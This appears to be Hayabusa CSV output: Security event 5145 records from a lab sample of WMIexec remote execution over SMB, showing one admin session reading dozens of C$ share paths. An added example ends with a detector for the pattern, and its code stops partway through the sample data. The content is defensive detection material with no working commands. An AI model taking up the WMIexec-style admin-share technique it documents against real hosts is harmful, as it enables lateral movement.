2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
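Added example, not part of this Hayabusa output and not Hayabusa's own code: a small Python detector that reads rows in this CSV layout and flags the pattern the 5145 records above show, one logon session (LID 0x18acdd) from 10.23.23.9 reading dozens of distinct paths under the C$ admin share within a few milliseconds, which is how WMIexec-style tooling pulls command output back over SMB. The column order, the admin-share heuristic (share name ending in $, IPC$ excluded), the thresholds and the two decoy rows are assumptions; the six 5145 rows are copied from this page with the RulePath and FilePath columns shortened.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in Hayabusa's CSV column layout (assumed: Timestamp, Computer,
# EventID, Level, MitreAttack, RuleTitle, Details, RulePath, FilePath). The first six
# data rows mirror 5145 records from this page with the last two columns shortened;
# the final two rows are invented decoys (one C$ access under another logon, and a
# non-admin share) to show what the detector ignores.
SAMPLE_CSV = r"""Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,r.yml,s.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,r.yml,s.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168# | IP Addr: 10.23.23.9 | LID: 0x18acdd,r.yml,s.evtx
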